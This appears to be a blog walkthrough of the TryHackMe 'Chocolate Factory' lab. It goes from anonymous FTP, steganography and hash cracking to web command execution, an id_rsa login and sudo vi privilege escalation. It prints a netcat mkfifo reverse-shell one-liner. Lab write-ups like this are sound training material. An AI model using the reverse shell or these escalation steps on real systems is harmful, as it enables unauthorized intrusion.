Chocolate Factory | THM

A Charlie And The Chocolate Factory themed room, revisit Willy Wonka’s chocolate factory!

Let’s begin this box
Usually starting with nmap scan,


nmap -sV -sC machine_IP

Taking peek into nmap scan result we can see port 22,21,80,100 are open, as mentioned in scan result port 21 has anonymous login, we proceed with enumeration on that port

++FTP Enumeration++

further loging in into FTP with username and passwd as anonymous
we find a png image i’m curious is this some type of stegnography
let’s find out , sho i downloaded this image to my local machine

get file_name.png /local directory/filename.png

getting file from FTP using get command

Let’s analyze the obtained file

this looks like chewing gums image..perhaps it’s always good habit to look into the image file don’t know what maybe hidden inside. So, now we can use steghide tool or any other tools of your choice..but I have selected Steghide and I’m going to proceed further with this tool
c’mon let’s reveal the hidden data .


steghide extract -sf file_name

voila as soon I pressed enter without any password it was accepted
further looking into the obtained file yea this is base64 hash Now we decode this and find what information is given . here we can use cyberchef for decoding the base64

we got /etc/passwd file

Now we need to decrypt the hash so here I’m going to use hashcat to decrypt the given hash to get user charlie passwd

Now we have username and password so head to machine webpage and your greeted with this login page :

Enter your credentials and proceed

Here We can see command execution can be performed

If my ‘ls’ command is working why I try other command and proceeding further I jus noticed a key file and submitted to related question as answer
So, commands are working ..then why not we proceed with some revershell
simultaneously We setup our net cat to listen the reverse_connection
here we go..


This reverse_shell script was taken from pentestmonkey

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 1234 >/tmp/f

after setting up port and machine_ip to netcat and reverse script
we got shell …horaaayyy…….


We don’t have permission to open the file

exploring each file in the directory

We got hold of id_rsa key

We proceed further by using this key we login as the given user



To check the permissions we type sudo -l . and Here we can Find that this particular user can execute “/user/bin/vi

I decided to take a look into gtfobins for escalation method

voila i’m root now we can cat the root.txt and we got our flag ::



executing with python it prompt with “Enter the key”
as soon as we enter the obtained key it gives us flag.

Finally it’s Pwned and we obtained desired flag
revisit the Willy Wonka’s Chocolate Factory and meet Oompa Loompa was nice. This was easy box which including all the entry level technique
thanks for reading ..




security researcher

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store

security researcher